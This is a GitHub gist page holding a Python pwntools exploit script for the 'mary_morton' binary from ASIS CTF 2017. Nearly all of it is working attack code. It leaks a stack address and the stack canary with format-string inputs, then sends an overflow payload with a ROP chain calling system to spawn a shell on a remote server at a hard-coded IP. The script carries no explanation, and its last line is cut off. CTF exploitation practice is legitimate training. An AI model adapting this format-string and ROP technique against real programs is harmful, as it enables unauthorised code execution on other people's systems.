-
-
Save bmphx2/11d6a094882af035890d3b2b628ee11b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from pwn import * | |
LOCAL = False | |
def leak_stack(): | |
log.info("leaking stack addr...") | |
target.sendline("2") | |
target.sendline("%1$p") | |
stack_addr = target.recvuntil("3. Exit the battle") | |
stack_address = int(stack_addr[0:16],16) | |
return stack_address | |
def leak_canary(): | |
log.info("leaking canaries...") | |
target.sendline("2") | |
target.sendline("%23$p") | |
stack_cookie = target.recvuntil("3. Exit the battle") | |
stack_cookies = int(stack_cookie[2:20],16) | |
return stack_cookies | |
def pwn(): | |
pop_rdi = 0x0000000000400ab3 | |
system_plt = 0x00000000004006a0 | |
log.info("ASIS CTF 2017: mary_morton exploit - mphx2") | |
target.recvuntil("3. Exit the battle") | |
stack_address = leak_stack() | |
log.info("stack found: %#x", stack_address) | |
bin_sh_stack = stack_address - 0x260d | |
stack_cookies = leak_canary() | |
log.info("canary found: %#x",stack_cookies) | |
sleep(0.5) | |
log.info("spawning /bin/sh") | |
target.sendline("1") | |
target.sendline("A"*128+"/bin/sh;"+p64(stack_cookies)+"AAAAAAAA"+p64(pop_rdi)+p64(bin_sh_stack)+p64(system_plt)) | |
target.interactive() | |
def main(): | |
global target | |
if LOCAL: | |
target = process("./mary_morton") | |
else: | |
target = remote("146.185.132.36",19153) | |
pwn() | |
if __name__ == "__main__": | |
main( |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment